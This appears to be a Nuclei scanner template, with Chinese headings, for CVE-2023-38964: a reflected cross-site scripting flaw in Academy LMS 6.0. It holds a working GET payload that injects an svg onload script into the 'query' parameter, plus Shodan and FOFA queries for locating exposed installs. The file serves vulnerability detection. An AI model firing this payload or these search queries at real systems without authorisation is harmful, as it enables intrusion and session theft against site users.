漏洞描述
Creative Item Academy LMS 6.0 was discovered to contain a cross-site scripting (XSS) vulnerability through `query` parameter.
CVE-2023-38964: Academy LMS 6.0 - Cross-Site Scripting
PoC代码[已公开]
id: CVE-2023-38964
info:
name: Academy LMS 6.0 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Creative Item Academy LMS 6.0 was discovered to contain a cross-site scripting (XSS) vulnerability through `query` parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: |
Apply the latest security patches provided by the vendor to mitigate the XSS vulnerability in Creative Item Academy LMS 6.0.
reference:
- https://vida03.gitbook.io/redteam/web/cve-2023-38964
- https://nvd.nist.gov/vuln/detail/CVE-2023-38964
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-38964
cwe-id: CWE-79
epss-score: 0.05504
epss-percentile: 0.89866
cpe: cpe:2.3:a:creativeitem:academy_lms:6.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: creativeitem
product: academy_lms
shodan-query: http.html:"academy lms"
fofa-query:
- body="Academy LMS"
- body="academy lms"
tags: cve2023,cve,academylms,xss,creativeitem
http:
- method: GET
path:
- '{{BaseURL}}/home/courses?query="><svg+onload=alert(document.domain)>'
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(header, "text/html")'
- 'contains_all(body, "<svg onload=alert(document.domain)>", "All courses</span>")'
condition: and
# digest: 4a0a00473045022100fd9eb1a30ec19d866dd166307089395ac4c433084b47fe1981d97d486d0aeef302203c8536d65ca31c348b8e26c5f26b32141be0ecbcfa80d1849b5e7118d32af76d:922c64590222798bb761d5b6d8e72950